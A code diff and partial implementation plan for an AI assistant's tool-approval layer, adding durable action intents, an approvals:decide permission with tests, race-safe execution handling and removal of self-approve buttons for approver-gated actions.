+        try {
+          intent = await createActionIntent(session.auth, {
+            toolName,
+            input: input as Record<string, unknown>,
+            source: 'chat',
+            reason: riskSummary,
+            orgId: session.orgId,
+          });
+        } catch (err) {
+          console.error('[AI-SDK] Failed to create action intent:', toolName, err);
+          return { allowed: false, error: 'Failed to create approval record' };
         }
-      } catch { /* non-fatal: fall back to default description */ }
-      const riskSummary = m365Summary ?? (description.length > 500 ? `${description.slice(0, 497)}...` : description);
 
-      // Create the durable intent. This fans out to eligible org approvers
-      // (or the sole-operator self-approval row), dispatches mobile push, and
-      // writes the intent_created outbox row — all internally, in one
-      // transaction (services/actionIntents/intentService.ts). Replaces the
-      // old direct approval_requests insert + dispatchApprovalPushToTokens
-      // call: createActionIntent is now the single place that does both.
-      let intent: Awaited<ReturnType<typeof createActionIntent>>;
-      try {
-        intent = await createActionIntent(session.auth, {
+        // Emit approval_required event via session event bus → UI shows Approve/Reject
+        session.eventBus.publish({
+          type: 'approval_required',
+          executionId: approvalExec.id,
+          approvalRequestId: intent.approvalRequestIds[0],
           toolName,
-          input: input as Record<string, unknown>,
-          source: 'chat',
-          reason: riskSummary,
-          orgId: session.orgId,
+          input,
+          description,
+          deviceContext,
         });
-      } catch (err) {
-        console.error('[AI-SDK] Failed to create action intent:', toolName, err);
-        return { allowed: false, error: 'Failed to create approval record' };
-      }
 
-      // Emit approval_required event via session event bus → UI shows Approve/Reject
-      session.eventBus.publish({
-        type: 'approval_required',
-        executionId: approvalExec.id,
-        approvalRequestId: intent.approvalRequestIds[0],
-        toolName,
-        input,
-        description,
-        deviceContext,
-      });
-
-      // Block until an approver decides, OR the chat wait window (still 300s
-      // — matches the intent's own 5-minute chat expiry) elapses. Unlike the
-      // old waitForApproval, this NEVER mutates the intent on timeout: giving
-      // up here leaves it pending_approval so an approver can still decide it
-      // — and the durable release worker (jobs/intentReleaseWorker.ts) will
-      // execute it — after this session has moved on or died. This is the
-      // new durable capability the design adds (spec §6.1).
-      const decisionStatus = await waitForIntentDecision(
-        intent.id,
-        300_000,
-        session.abortController.signal,
-      );
-
-      if (decisionStatus === 'pending_approval') {
-        return {
-          allowed: false,
-          error: 'Approval still pending; this action will complete once approved.',
-        };
-      }
-
-      if (decisionStatus === 'rejected' || decisionStatus === 'cancelled' || decisionStatus === 'expired') {
-        return { allowed: false, error: 'Tool execution was rejected, cancelled, or expired' };
-      }
-
-      // decisionStatus is one of approved/executing/completed/failed here.
-      // COORDINATION INVARIANT (CRITICAL — prevents double execution): the
-      // durable release worker also consumes the intent_approved outbox and
-      // may already be executing (or have executed/failed) this same intent.
-      // The `approved -> executing` CAS is the SINGLE mutual-exclusion point
-      // between this session and the worker — whichever side wins it is the
-      // only side allowed to run the tool. transitionIntent re-checks the
-      // CURRENT status atomically, so it's correct to attempt it here
-      // regardless of which terminal-ish status waitForIntentDecision
-      // happened to observe (that read can be stale by the time we get here).
-      const wonRelease = await transitionIntent(intent.id, 'approved', 'executing', { executedAt: null });
-      if (!wonRelease) {
-        // Lost the race: the release worker (or a duplicate outbox delivery)
-        // already claimed this intent for execution. Do NOT run the tool
-        // inline — that would double-execute a real side effect. The worker
-        // owns the ledger write and the intent's final result/error_code.
-        return {
-          allowed: false,
-          error: 'This action is already being completed by the approval worker; it will not run twice.',
-        };
-      }
-
-      // Won the release: track the intent id so createSessionPostToolUse can
-      // CAS it executing -> completed|failed once the inline tool call
-      // actually finishes (see pendingIntentBySession above).
-      pendingIntentBySession.set(session, intent.id);
-
-      // Mark as executing
-      try {
-        await withDbAccessContext(
-          { scope: 'organization', orgId: session.orgId, accessibleOrgIds: [session.orgId] },
-          () =>
-            db
-              .update(aiToolExecutions)
-              .set({ status: 'executing' })
-              .where(eq(aiToolExecutions.id, approvalExec!.id))
+        // Block until an approver decides, OR the chat wait window (still 300s
+        // — matches the intent's own 5-minute chat expiry) elapses. Unlike the
+        // old waitForApproval, this NEVER mutates the intent on timeout: giving
+        // up here leaves it pending_approval so an approver can still decide it
+        // — and the durable release worker (jobs/intentReleaseWorker.ts) will
+        // execute it — after this session has moved on or died. This is the
+        // new durable capability the design adds (spec §6.1).
+        const decisionStatus = await waitForIntentDecision(
+          intent.id,
+          300_000,
+          session.abortController.signal,
         );
-      } catch (err) {
-        console.error('[AI-SDK] Failed to update approval status to executing:', approvalExec.id, err);
+
+        if (decisionStatus === 'pending_approval') {
+          return {
+            allowed: false,
+            error: 'Approval still pending; this action will complete once approved.',
+          };
+        }
+
+        if (decisionStatus === 'rejected' || decisionStatus === 'cancelled' || decisionStatus === 'expired') {
+          return { allowed: false, error: 'Tool execution was rejected, cancelled, or expired' };
+        }
+
+        // decisionStatus is one of approved/executing/completed/failed here.
+        // COORDINATION INVARIANT (CRITICAL — prevents double execution): the
+        // durable release worker also consumes the intent_approved outbox and
+        // may already be executing (or have executed/failed) this same intent.
+        // The `approved -> executing` CAS is the SINGLE mutual-exclusion point
+        // between this session and the worker — whichever side wins it is the
+        // only side allowed to run the tool. transitionIntent re-checks the
+        // CURRENT status atomically, so it's correct to attempt it here
+        // regardless of which terminal-ish status waitForIntentDecision
+        // happened to observe (that read can be stale by the time we get here).
+        const wonRelease = await transitionIntent(intent.id, 'approved', 'executing', { executedAt: null });
+        if (!wonRelease) {
+          // Lost the race: the release worker (or a duplicate outbox delivery)
+          // already claimed this intent for execution. Do NOT run the tool
+          // inline — that would double-execute a real side effect. The worker
+          // owns the ledger write and the intent's final result/error_code.
+          return {
+            allowed: false,
+            error: 'This action is already being completed by the approval worker; it will not run twice.',
+          };
+        }
+
+        // Won the release: track the intent id so createSessionPostToolUse can
+        // CAS it executing -> completed|failed once the inline tool call
+        // actually finishes (see pendingIntentBySession above).
+        pendingIntentBySession.set(session, intent.id);
+
+        // Mark as executing
+        try {
+          await withDbAccessContext(
+            { scope: 'organization', orgId: session.orgId, accessibleOrgIds: [session.orgId] },
+            () =>
+              db
+                .update(aiToolExecutions)
+                .set({ status: 'executing' })
+                .where(eq(aiToolExecutions.id, approvalExec!.id))
+          );
+        } catch (err) {
+          console.error('[AI-SDK] Failed to update approval status to executing:', approvalExec.id, err);
+        }
+      } else {
+        // ---- Tier 2 under per_step: legacy lightweight approval bridge ----
+        // Restored verbatim (behavior-for-behavior) from the pre-Task-8
+        // revision (commit 84f879b2477846d8cda9dbe50ff0aea97b4e356) — this is
+        // a per-step "approve each step" chat UX, NOT a durable, org-approver-
+        // pool-backed intent. It must NOT call createActionIntent: that
+        // throws ActionIntentTierError('tool_not_tier3') for anything below
+        // Tier 3 (services/actionIntents/intentService.ts), which is exactly
+        // the regression this restores. No entry goes into
+        // pendingIntentBySession here, so the postToolUse completion-CAS
+        // hook (keyed off that map) stays a no-op for this path.
+        //
+        // Bridge to mobile-readable approval_requests row.
+        // Mobile clients read from /api/v1/mobile/approvals/* (NEVER from
+        // ai_tool_executions). The approve/deny route handlers resolve the
+        // execution_id back to the SDK's waitForApproval() poll.
+        //
+        // Tier → riskTier mapping (documented in the spec): Tier 2 → 'medium'.
+        const riskTier: 'medium' | 'high' | 'critical' =
+          guardrailCheck.tier >= 4 ? 'critical' : guardrailCheck.tier >= 3 ? 'high' : 'medium';
+        const actionLabel = description;
+        // For M365 mutation tools, enrich the approval card with the customer
+        // tenant + target user + reason. Non-fatal: any DB hiccup falls back to
+        // the default description rather than throwing into the approval path.
+        let m365Summary: string | null = null;
+        try {
+          const sessRow = await loadSession(session.breezeSessionId);
+          if (sessRow?.delegantM365ConnectionId) {
+            const conn = await loadConnection(sessRow.delegantM365ConnectionId);
+            m365Summary = buildM365RiskSummary(toolName, input as Record<string, unknown>, conn);
+          }
+        } catch { /* non-fatal: fall back to default description */ }
+        const riskSummary = m365Summary ?? (description.length > 500 ? `${description.slice(0, 497)}...` : description);
+        const expiresAt = new Date(Date.now() + 300_000); // matches waitForApproval timeout
+
+        let approvalRequestId: string | undefined;
+        try {
+          const [approvalRow] = await withDbAccessContext(
+            {
+              scope: 'organization',
+              orgId: session.orgId,
+              accessibleOrgIds: [session.orgId],
+              userId: session.auth.user.id,
+            },
+            () =>
+              db
+                .insert(approvalRequests)
+                .values({
+                  userId: session.auth.user.id,
+                  executionId: approvalExec!.id,
+                  requestingClientLabel: 'Breeze AI',
+                  requestingMachineLabel: null,
+                  actionLabel,
+                  actionToolName: stripMcpPrefix(toolName),
+                  actionArguments: input as Record<string, unknown>,
+                  riskTier,
+                  riskSummary,
+                  status: 'pending',
+                  // The chat session's originating OAuth client is not yet
+                  // tracked on aiSessions; until that lands, the AI-agent
+                  // path can't be a self-loop with the mobile push target.
+                  // (deriveIsRecursive() with a null requestingClientId
+                  // returns false — explicit here for documentation.)
+                  isRecursive: false,
+                  expiresAt,
+                })
+                .returning({ id: approvalRequests.id })
+          );
+          approvalRequestId = approvalRow?.id;
+        } catch (err) {
+          console.error('[AI-SDK] Failed to create mobile approval_request row:', err);
+          // Non-fatal: SSE approval flow still works for in-app web UI even
+          // without the mobile-readable row. The approve/deny handler simply
+          // won't have an executionId to resolve back to.
+        }
+
+        // Best-effort push notification to the user's mobile device(s).
+        if (approvalRequestId) {
+          try {
+            // Token read happens INSIDE the org DB context; the push network
+            // sends run AFTER it closes so we never hold the transaction open
+            // across the round-trip (#1105). dispatchApprovalPushToTokens fans
+            // out across every provider (Expo relay + native APNs).
+            const tokens = await withDbAccessContext(
+              {
+                scope: 'organization',
+                orgId: session.orgId,
+                accessibleOrgIds: [session.orgId],
+                userId: session.auth.user.id,
+              },
+              () => getUserPushTokens(session.auth.user.id),
+            );
+            await dispatchApprovalPushToTokens(tokens, {
+              approvalId: approvalRequestId,
+              actionLabel,
+              requestingClientLabel: 'Breeze AI',
+            });
+          } catch (err) {
+            console.error('[AI-SDK] Failed to dispatch approval push notification:', err);
+          }
+        }
+
+        // Emit approval_required event via session event bus → UI shows Approve/Reject
+        session.eventBus.publish({
+          type: 'approval_required',
+          executionId: approvalExec.id,
+          approvalRequestId,
+          toolName,
+          input,
+          description,
+          deviceContext,
+        });
+
+        // Block until user clicks Approve/Reject or 5-min timeout
+        const approved = await waitForApproval(
+          approvalExec.id,
+          300_000,
+          session.abortController.signal,
+        );
+
+        if (!approved) {
+          return { allowed: false, error: 'Tool execution was rejected or timed out' };
+        }
+
+        // Mark as executing
+        try {
+          await withDbAccessContext(
+            { scope: 'organization', orgId: session.orgId, accessibleOrgIds: [session.orgId] },
+            () =>
+              db
+                .update(aiToolExecutions)
+                .set({ status: 'executing' })
+                .where(eq(aiToolExecutions.id, approvalExec!.id))
+          );
+        } catch (err) {
+          console.error('[AI-SDK] Failed to update approval status to executing:', approvalExec.id, err);
+        }
       }
     }
 

--- a/apps/api/src/services/permissions.test.ts
+++ b/apps/api/src/services/permissions.test.ts
@@ -58,6 +58,7 @@ import {
   clearPermissionCache,
   isAssignablePermission,
   isKnownPermission,
+  userCanDecideApprovals,
   PERMISSIONS,
   type UserPermissions
 } from './permissions';
@@ -601,6 +602,74 @@ describe('permissions service', () => {
       const p = { resource: 'sso', action: 'admin' };
       expect(isKnownPermission(p)).toBe(true);
       expect(isAssignablePermission(p)).toBe(true);
+    });
+  });
+
+  describe('approvals:decide permission (action intents approval layer, §4)', () => {
+    it('is defined in the catalog as resource=approvals action=decide', () => {
+      expect(PERMISSIONS.APPROVALS_DECIDE).toEqual({ resource: 'approvals', action: 'decide' });
+    });
+
+    it('is a known, assignable permission', () => {
+      const p = { resource: 'approvals', action: 'decide' };
+      expect(isKnownPermission(p)).toBe(true);
+      expect(isAssignablePermission(p)).toBe(true);
+    });
+
+    describe('userCanDecideApprovals', () => {
+      it('returns true for an Org Admin-shaped grant (explicit approvals:decide)', () => {
+        const userPerms: UserPermissions = {
+          permissions: [{ resource: 'approvals', action: 'decide' }],
+          partnerId: null,
+          orgId: 'org-1',
+          roleId: 'role-org-admin',
+          scope: 'organization'
+        };
+
+        expect(userCanDecideApprovals(userPerms)).toBe(true);
+      });
+
+      it('returns true for a Partner Admin-shaped grant via the *:* wildcard', () => {
+        const userPerms: UserPermissions = {
+          permissions: [{ resource: '*', action: '*' }],
+          partnerId: 'partner-1',
+          orgId: null,
+          roleId: 'role-partner-admin',
+          scope: 'partner'
+        };
+
+        expect(userCanDecideApprovals(userPerms)).toBe(true);
+      });
+
+      it('returns false for an Org Technician-shaped grant (no approvals:decide)', () => {
+        const userPerms: UserPermissions = {
+          permissions: [
+            { resource: 'devices', action: 'read' },
+            { resource: 'devices', action: 'write' },
+            { resource: 'devices', action: 'execute' },
+            { resource: 'scripts', action: 'read' },
+            { resource: 'scripts', action: 'execute' }
+          ],
+          partnerId: null,
+          orgId: 'org-1',
+          roleId: 'role-org-technician',
+          scope: 'organization'
+        };
+
+        expect(userCanDecideApprovals(userPerms)).toBe(false);
+      });
+
+      it('returns false for empty permissions', () => {
+        const userPerms: UserPermissions = {
+          permissions: [],
+          partnerId: null,
+          orgId: 'org-1',
+          roleId: 'role-1',
+          scope: 'organization'
+        };
+
+        expect(userCanDecideApprovals(userPerms)).toBe(false);
+      });
     });
   });
 });

--- a/apps/api/src/services/permissions.ts
+++ b/apps/api/src/services/permissions.ts
@@ -217,6 +217,16 @@ export function hasPermission(
   );
 }
 
+// Gates who may decide (approve/deny) a pending action-intent approval
+// (§4, 2026-07-18-action-intents-approval-layer-design.md). `userPerms` is
+// already resolved per-org/per-partner by getUserPermissions(userId, {orgId})
+// — mirrors every other hasPermission(userPerms, resource, action) call site
+// (e.g. aiToolsTicketing.ts) — so this helper does not take a separate orgId;
+// callers resolve org-scoped perms first, same as the rest of the module.
+export function userCanDecideApprovals(userPerms: UserPermissions): boolean {
+  return hasPermission(userPerms, PERMISSIONS.APPROVALS_DECIDE.resource, PERMISSIONS.APPROVALS_DECIDE.action);
+}
+
 export function canAccessOrg(
   userPerms: UserPermissions,
   orgId: string

--- a/apps/api/src/services/tenantCascade.ts
+++ b/apps/api/src/services/tenantCascade.ts
@@ -64,6 +64,7 @@ import * as self from './tenantCascade';
 const CORE_ORG_CASCADE_DELETE_ORDER: ReadonlyArray<string> = Object.freeze([
   'access_reviews',
   'account_deletion_requests',
+  'action_intents',
   'agent_logs',
   'ai_action_plans',
   'ai_budgets',

--- a/apps/web/src/components/ai/AiApprovalDialog.test.tsx
+++ b/apps/web/src/components/ai/AiApprovalDialog.test.tsx
@@ -1,0 +1,46 @@
+import { render, screen } from '@testing-library/react';
+import { describe, expect, it, vi } from 'vitest';
+
+import AiApprovalDialog from './AiApprovalDialog';
+
+// CRITICAL-3 (whole-branch review): the web chat "Approve" button was a
+// silent no-op for Tier-3 durable intents — the sessions-approve route only
+// ever flipped ai_tool_executions while the chat flow actually blocked on
+// action_intents.status. The fix is: intent-backed executions never render a
+// self-approve button here — they render a "waiting for an approver" state
+// instead, since deciding happens on the /approvals surface (mobile push or
+// the Approvals queue).
+
+const baseProps = {
+  toolName: 'execute_command',
+  description: 'Execute a command on host-1',
+  input: { deviceId: 'device-1' },
+  onApprove: vi.fn(),
+  onReject: vi.fn(),
+};
+
+describe('AiApprovalDialog', () => {
+  it('renders Approve/Reject buttons for a non-intent-backed (legacy Tier-2) execution', () => {
+    render(<AiApprovalDialog {...baseProps} />);
+
+    expect(screen.getByRole('button', { name: /approve/i })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /reject/i })).toBeInTheDocument();
+  });
+
+  it('renders a waiting-for-an-approver state instead of a self-approve button when intentBacked', () => {
+    render(<AiApprovalDialog {...baseProps} intentBacked />);
+
+    expect(screen.queryByRole('button', { name: /^approve$/i })).not.toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: /^reject$/i })).not.toBeInTheDocument();
+    expect(screen.getByText(/waiting for an approver/i)).toBeInTheDocument();
+    expect(
+      screen.getByText(/needs approval in the approvals area or the breeze mobile app/i),
+    ).toBeInTheDocument();
+  });
+
+  it('does not render the client-side auto-deny countdown timer when intentBacked', () => {
+    render(<AiApprovalDialog {...baseProps} intentBacked />);
+
+    expect(screen.queryByRole('timer')).not.toBeInTheDocument();
+  });
+});

--- a/apps/web/src/components/ai/AiApprovalDialog.tsx
+++ b/apps/web/src/components/ai/AiApprovalDialog.tsx
@@ -1,5 +1,5 @@
 import { useState, useEffect } from "react";
-import { ShieldAlert, Check, X, Clock, Monitor } from "lucide-react";
+import { ShieldAlert, Check, X, Clock, Monitor, Hourglass } from "lucide-react";
 import { cn, widthPercentClass } from "@/lib/utils";
 import { useTranslation } from "react-i18next";
 
@@ -31,6 +31,15 @@ interface AiApprovalDialogProps {
   deviceContext?: DeviceContext;
   onApprove: () => void;
   onReject: () => void;
+  /**
+   * True for Tier-3 durable action-intents (spec §6.1). Intent-backed
+   * executions are decided via the /approvals surface (mobile push or the
+   * Approvals queue) — a four-eyes model where the requester is usually NOT
+   * an eligible approver of their own intent. This card must NEVER offer a
+   * self-approve button for one (whole-branch review CRITICAL-3: the
+   * sessions-approve route silently no-op'd for these before this fix).
+   */
+  intentBacked?: boolean;
 }
 
 function filterInput(input: Record<string, unknown>): Record<string, unknown> {
@@ -142,11 +151,18 @@ export default function AiApprovalDialog({
   deviceContext,
   onApprove,
   onReject,
+  intentBacked,
 }: AiApprovalDialogProps) {
   const { t } = useTranslation("ai");
   const [remainingMs, setRemainingMs] = useState(AUTO_DENY_MS);
 
+  // Intent-backed executions are decided durably via the /approvals surface,
+  // not this card (see the prop doc above) — there is nothing here to
+  // auto-reject on a client-side timer, and doing so would just fire a
+  // self-approval-shaped request the backend now correctly refuses. Skip the
+  // countdown entirely for that case.
   useEffect(() => {
+    if (intentBacked) return;
     const start = Date.now();
     const interval = setInterval(() => {
       const remaining = AUTO_DENY_MS - (Date.now() - start);
@@ -158,7 +174,7 @@ export default function AiApprovalDialog({
       }
     }, 1000);
     return () => clearInterval(interval);
-  }, [onReject]);
+  }, [onReject, intentBacked]);
 
   const minutes = Math.floor(remainingMs / 60000);
   const seconds = Math.floor((remainingMs % 60000) / 1000);
@@ -168,7 +184,7 @@ export default function AiApprovalDialog({
   const visibleInput = filterInput(input);
   const hasVisibleInput = Object.keys(visibleInput).length > 0;
 
-  const isUrgent = remainingMs < 30_000;
+  const isUrgent = !intentBacked && remainingMs < 30_000;
 
   return (
     <div
@@ -178,19 +194,25 @@ export default function AiApprovalDialog({
     >
       <div className="flex items-center justify-between">
         <div className="flex items-center gap-2">
-          <ShieldAlert className="h-4 w-4 text-amber-400" />
+          {intentBacked ? (
+            <Hourglass className="h-4 w-4 text-amber-400" />
+          ) : (
+            <ShieldAlert className="h-4 w-4 text-amber-400" />
+          )}
           <span className="text-sm font-medium text-amber-700 dark:text-amber-300">
-            {t("aiApprovalDialog.title")}
+            {intentBacked ? t("aiApprovalDialog.pendingApproverTitle") : t("aiApprovalDialog.title")}
           </span>
         </div>
-        <div
-          className="flex items-center gap-1.5 text-xs text-gray-500"
-          role="timer"
-          aria-label={t("aiApprovalDialog.timeRemaining", { minutes, seconds })}
-        >
-          <Clock className="h-3 w-3" />
-          <span>{countdown}</span>
-        </div>
+        {!intentBacked && (
+          <div
+            className="flex items-center gap-1.5 text-xs text-gray-500"
+            role="timer"
+            aria-label={t("aiApprovalDialog.timeRemaining", { minutes, seconds })}
+          >
+            <Clock className="h-3 w-3" />
+            <span>{countdown}</span>
+          </div>
+        )}
       </div>
       {isUrgent && (
         <span className="sr-only" role="alert">
@@ -199,25 +221,33 @@ export default function AiApprovalDialog({
       )}
 
       {/* Countdown progress bar */}
-      <div
-        className="mt-2 h-0.5 w-full overflow-hidden rounded-full bg-gray-200 dark:bg-gray-800"
-        role="progressbar"
-        aria-valuenow={Math.round(progressPct)}
-        aria-valuemin={0}
-        aria-valuemax={100}
-        aria-label={t("aiApprovalDialog.progressLabel")}
-      >
+      {!intentBacked && (
         <div
-          className={cn(
-            "h-full rounded-full bg-amber-500/60 transition-all duration-1000 ease-linear",
-            widthPercentClass(progressPct),
-          )}
-        />
-      </div>
+          className="mt-2 h-0.5 w-full overflow-hidden rounded-full bg-gray-200 dark:bg-gray-800"
+          role="progressbar"
+          aria-valuenow={Math.round(progressPct)}
+          aria-valuemin={0}
+          aria-valuemax={100}
+          aria-label={t("aiApprovalDialog.progressLabel")}
+        >
+          <div
+            className={cn(
+              "h-full rounded-full bg-amber-500/60 transition-all duration-1000 ease-linear",
+              widthPercentClass(progressPct),
+            )}
+          />
+        </div>
+      )}
 
       <p className="mt-2 text-sm text-gray-700 dark:text-gray-300">
         {description}
       </p>
+
+      {intentBacked && (
+        <p className="mt-1 text-xs text-gray-500 dark:text-gray-400">
+          {t("aiApprovalDialog.pendingApproverDescription")}
+        </p>
+      )}
 
       {deviceContext && <DeviceBadge ctx={deviceContext} />}
 
@@ -232,24 +262,30 @@ export default function AiApprovalDialog({
         </details>
       )}
 
-      <div className="mt-3 flex gap-2">
-        <button
-          type="button"
-          onClick={onApprove}
-          className="flex items-center gap-1.5 rounded-md bg-green-600 px-3 py-1.5 text-xs font-medium text-white transition-colors hover:bg-green-500"
-        >
-          <Check className="h-3.5 w-3.5" />
-          {t("aiApprovalDialog.approve")}
-        </button>
-        <button
-          type="button"
-          onClick={onReject}
-          className="flex items-center gap-1.5 rounded-md bg-gray-200 px-3 py-1.5 text-xs font-medium text-gray-700 transition-colors hover:bg-gray-300 dark:bg-gray-700 dark:text-gray-300 dark:hover:bg-gray-600"
-        >
-          <X className="h-3.5 w-3.5" />
-          {t("aiApprovalDialog.reject")}
-        </button>
-      </div>
+      {/* Intent-backed executions never show a self-approve button here — the
+          four-eyes model means the requester is usually not an eligible
+          approver of their own action intent (whole-branch review
+          CRITICAL-3). Deciding happens on the /approvals surface instead. */}
+      {!intentBacked && (
+        <div className="mt-3 flex gap-2">
+          <button
+            type="button"
+            onClick={onApprove}
+            className="flex items-center gap-1.5 rounded-md bg-green-600 px-3 py-1.5 text-xs font-medium text-white transition-colors hover:bg-green-500"
+          >
+            <Check className="h-3.5 w-3.5" />
+            {t("aiApprovalDialog.approve")}
+          </button>
+          <button
+            type="button"
+            onClick={onReject}
+            className="flex items-center gap-1.5 rounded-md bg-gray-200 px-3 py-1.5 text-xs font-medium text-gray-700 transition-colors hover:bg-gray-300 dark:bg-gray-700 dark:text-gray-300 dark:hover:bg-gray-600"
+          >
+            <X className="h-3.5 w-3.5" />
+            {t("aiApprovalDialog.reject")}
+          </button>
+        </div>
+      )}
     </div>
   );
 }

--- a/apps/web/src/components/ai/AiChatMessages.tsx
+++ b/apps/web/src/components/ai/AiChatMessages.tsx
@@ -41,6 +41,8 @@ interface PendingApproval {
       sessionType: string;
     }>;
   };
+  /** Tier-3 durable action-intent (spec §6.1) — see AiApprovalDialog's prop doc. */
+  intentBacked?: boolean;
 }
 
 interface PendingPlan {
@@ -316,6 +318,7 @@ export default function AiChatMessages({
           deviceContext={pendingApproval.deviceContext}
           onApprove={() => onApprove(pendingApproval.executionId)}
           onReject={() => onReject(pendingApproval.executionId)}
+          intentBacked={pendingApproval.intentBacked}
         />
       )}
 

--- a/apps/web/src/locales/de-DE/ai.json
+++ b/apps/web/src/locales/de-DE/ai.json
@@ -13,6 +13,8 @@
     },
     "ariaLabel": "Tool-Genehmigung erforderlich: {{toolName}}",
     "title": "Genehmigung erforderlich",
+    "pendingApproverTitle": "Warten auf eine genehmigende Person",
+    "pendingApproverDescription": "Diese Aktion muss im Bereich „Genehmigungen“ oder in der Breeze-Mobile-App genehmigt werden.",
     "timeRemaining": "Verbleibend: {{minutes}} Min., {{seconds}} Sek.",
     "urgentWarning": "Weniger als 30 Sekunden verbleiben. Diese Anfrage wird automatisch abgelehnt.",
     "progressLabel": "Verbleibende Zeit bis zur automatischen Ablehnung",

--- a/apps/web/src/locales/en/ai.json
+++ b/apps/web/src/locales/en/ai.json
@@ -13,6 +13,8 @@
     },
     "ariaLabel": "Tool approval required: {{toolName}}",
     "title": "Approval Required",
+    "pendingApproverTitle": "Waiting for an Approver",
+    "pendingApproverDescription": "This action needs approval in the Approvals area or the Breeze mobile app.",
     "timeRemaining": "{{minutes}} minutes {{seconds}} seconds remaining",
     "urgentWarning": "Less than 30 seconds remaining. This request will be auto-rejected.",
     "progressLabel": "Time remaining before auto-rejection",

--- a/apps/web/src/locales/es-419/ai.json
+++ b/apps/web/src/locales/es-419/ai.json
@@ -13,6 +13,8 @@
     },
     "ariaLabel": "Se requiere aprobación de herramienta: {{toolName}}",
     "title": "Aprobación requerida",
+    "pendingApproverTitle": "Esperando a un aprobador",
+    "pendingApproverDescription": "Esta acción necesita aprobación en el área de Aprobaciones o en la aplicación móvil de Breeze.",
     "timeRemaining": "{{minutes}} minutos {{seconds}} segundos restantes",
     "urgentWarning": "Quedan menos de 30 segundos. Esta solicitud será rechazada automáticamente.",
     "progressLabel": "Tiempo restante antes del rechazo automático",

--- a/apps/web/src/locales/fr-FR/ai.json
+++ b/apps/web/src/locales/fr-FR/ai.json
@@ -13,6 +13,8 @@
     },
     "ariaLabel": "Approbation de l’outil requise : {{toolName}}",
     "title": "Approbation requise",
+    "pendingApproverTitle": "En attente d’un approbateur",
+    "pendingApproverDescription": "Cette action doit être approuvée dans la section Approbations ou dans l’application mobile Breeze.",
     "timeRemaining": "{{minutes}} minutes {{seconds}} secondes restantes",
     "urgentWarning": "Moins de 30 secondes restantes. Cette demande sera automatiquement rejetée.",
     "progressLabel": "Temps restant avant l’auto-rejet",

--- a/apps/web/src/locales/pt-BR/ai.json
+++ b/apps/web/src/locales/pt-BR/ai.json
@@ -13,6 +13,8 @@
     },
     "ariaLabel": "Aprovação da ferramenta necessária: {{toolName}}",
     "title": "Aprovação necessária",
+    "pendingApproverTitle": "Aguardando um aprovador",
+    "pendingApproverDescription": "Esta ação precisa de aprovação na área de Aprovações ou no aplicativo móvel do Breeze.",
     "timeRemaining": "{{minutes}} minutos e {{seconds}} segundos restantes",
     "urgentWarning": "Menos de 30 segundos restantes. Esta solicitação será rejeitada automaticamente.",
     "progressLabel": "Tempo restante antes da rejeição automática",

--- a/apps/web/src/stores/processStreamEvent.ts
+++ b/apps/web/src/stores/processStreamEvent.ts
@@ -27,6 +27,8 @@ export interface PendingApproval {
   input: Record<string, unknown>;
   description: string;
   deviceContext?: DeviceContext;
+  /** Tier-3 durable action-intent (spec §6.1) — see AiApprovalDialog's prop doc. */
+  intentBacked?: boolean;
 }
 
 export interface PendingPlan {
@@ -129,6 +131,7 @@ export function processStreamEvent(
           input: event.input,
           description: event.description,
           deviceContext: event.deviceContext,
+          intentBacked: event.intentBacked,
         }
       }));
       return currentAssistantId;

--- a/docs/superpowers/plans/2026-07-18-action-intents-core.md
+++ b/docs/superpowers/plans/2026-07-18-action-intents-core.md
@@ -1,0 +1,300 @@
+# Action Intents Core (Plan 1 of 2) Implementation Plan
+
+> **For agentic workers:** REQUIRED SUB-SKILL: Use superpowers:subagent-driven-development (recommended) or superpowers:executing-plans to implement this plan task-by-task. Steps use checkbox (`- [ ]`) syntax for tracking.
+
+**Goal:** Durable, digest-bound `action_intents` + transactional outbox + approver fan-out through `approval_requests`, with the chat SDK's Tier-3 flow rebuilt on top — purely additive, no external behavior break.
+
+**Architecture:** New org-scoped immutable-content `action_intents` table and system-scoped `intent_outbox` written atomically; approvals fan out one row per eligible approver via the existing `approval_requests` machinery (PAM-bridge pattern); a BullMQ outbox publisher and a release worker with pre-execution revalidation; `aiAgentSdk.ts` T3 becomes intent-backed with an inline fast path.
+
+**Tech Stack:** Drizzle, hand-written SQL migration, BullMQ, node:crypto, Vitest.
+
+**Spec:** `docs/superpowers/specs/2026-07-18-action-intents-approval-layer-design.md` — the requirements source; read it before any task.
+
+## Global Constraints
+
+- Migration `2026-07-18-action-intents.sql`: idempotent, no inner BEGIN/COMMIT, RLS enabled+forced+policy in the SAME migration, `action_intents` added to `CORE_ORG_CASCADE_DELETE_ORDER` (alphabetical, FK-children-first) AND the RLS coverage allowlist in the same PR. `intent_outbox` is INTENTIONAL_UNSCOPED (system workers only, like `device_commands`) — document it as such in the RLS coverage test.
+- Immutable content columns are UPDATE-blocked by trigger; lifecycle columns are the only mutable ones.
+- Every state transition is a CAS: `UPDATE … WHERE id = $1 AND status = $expected`; zero rows = lost race, never an error.
+- Expiry constants: `chat` 5 minutes, `mcp_api` 24 hours. Budget/expiry values are constants, not env vars.
+- BullMQ jobIds use hyphens, never colons: `intent-created-<uuid>`, `intent-approved-<uuid>`.
+- Sole-operator self-approval requires `decidedAssuranceLevel >= 3`; multi-approver orgs NEVER create an approval row for the requester.
+- Audit details carry ids/action-name/digest/summaries — never raw argument contents.
+- Sanitized result cap 64 KiB; oversize → `{truncated: true}` stored, intent still `completed`.
+- No behavior change to external MCP in this plan (that is Plan 2). Chat UX timing unchanged (fast path stays inline).
+- Run everything with pinned Node 22.20.0; API tsc needs `NODE_OPTIONS=--max-old-space-size=8192`.
+- This worktree may contain unrelated concurrent WIP — stage files explicitly, never `git add -A`/stash.
+
+## File Map
+
+| File | Action | Responsibility |
+|---|---|---|
+| `apps/api/migrations/2026-07-18-action-intents.sql` | Create | Tables, enums, trigger, RLS, `approval_requests` ALTER |
+| `apps/api/src/db/schema/actionIntents.ts` | Create | Drizzle schema for both tables |
+| `apps/api/src/db/schema/approvals.ts` | Modify | `intentId`, `boundArgumentDigest` columns |
+| `apps/api/src/db/schema/index.ts` (or barrel) | Modify | Export new schema |
+| `apps/api/src/services/actionIntents/canonicalize.ts` | Create | Canonical JSON + SHA-256 digest |
+| `apps/api/src/services/actionIntents/intentService.ts` | Create | Create/CAS-transition/fan-out/idempotency |
+| `apps/api/src/services/actionIntents/actorContext.ts` | Create | Rebuild AuthContext from stored actor |
+| `apps/api/src/services/actionIntents/metrics.ts` | Create | Counter + audit helpers |
